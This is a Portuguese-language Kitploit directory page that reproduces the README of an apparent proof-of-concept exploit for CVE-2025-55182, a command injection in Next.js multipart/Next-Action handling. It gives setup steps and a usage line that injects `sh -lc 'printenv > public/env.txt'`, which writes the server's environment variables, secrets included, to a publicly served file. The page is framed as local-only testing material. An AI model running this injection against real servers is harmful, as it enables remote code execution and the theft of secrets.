Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — Exploração de prova de conceito para CVE-2025-55182 visando o tratamento multipart/Next-Action do Next.js com um script de demonstração de injeção de comando local. | Kitploit
Ferramentas/GitHubGitHub/youneszddz/cve-2025-55182
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubyouneszddz/cve-2025-55182

CVE-2025-55182

Exploração de prova de conceito para CVE-2025-55182 visando o tratamento multipart/Next-Action do Next.js com um script de demonstração de injeção de comando local.

Ver Repositório
2há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 Nextjs POC

Um pequeno repositório contendo:

  • test-app/: um aplicativo de teste Next.js 16 (React 19) usando o App Router.
  • exploit.js: um script local de prova de conceito usado para demonstrar e testar o comportamento do servidor em relação ao tratamento de multipart/Next-Action. Destinado apenas a testes locais.

Estrutura do repositório

root@kitploit:~
rsc-test-app/
├─ README.md                # You are here
├─ exploit.js               # PoC script (local-only)
└─ test-app/                # Next.js application
   ├─ app/                  # App Router pages
   ├─ public/               # Static assets (and env.txt when generated)
   ├─ package.json          # Next 16 / React 19
   └─ README.md             # Default Next.js template README

Pré-requisitos

  • Node.js 18+ recomendado (testado com Node 22)
  • npm (ou seu gerenciador de pacotes preferido)

Começando (aplicativo Next.js)

  1. Instale as dependências:
root@kitploit:~
cd test-app
npm install
  1. Execute o servidor de desenvolvimento:
root@kitploit:~
npm run dev
# App will be available at http://localhost:3000
  1. Compile e inicie (produção):
root@kitploit:~
npm run build
npm start

Script PoC local: exploit.js

Este script cria uma requisição multipart com um cabeçalho Next-Action para exercitar o comportamento do servidor. Por padrão, ele tenta executar um comando no processo do servidor que grava as variáveis de ambiente em public/env.txt (para demonstração em um ambiente local/dev).

Notas importantes:

  • Isto é apenas para testes locais. Não use contra sistemas que você não possui ou não tem permissão para testar.
  • O script pressupõe que o diretório de trabalho do servidor esteja alinhado de modo que public/ seja resolvido em test-app/public/.

Uso

Em um terminal separado, certifique-se de que o aplicativo Next.js esteja rodando em http://localhost:3000:

root@kitploit:~
cd test-app
npm run dev

Na raiz do repositório, execute o script:

root@kitploit:~
node exploit.js http://localhost:3000 "sh -lc 'printenv > public/env.txt'"

Parâmetros:

  • URL base (opcional): o padrão é http://localhost:3000.
  • Comando (opcional): o padrão é sh -lc 'printenv > public/env.txt'.

Após a execução, verifique o arquivo gerado:

acessando

root@kitploit:~
http://localhost:3000/env.txt

E aí estão as variáveis de ambiente do servidor.

Baixar ferramenta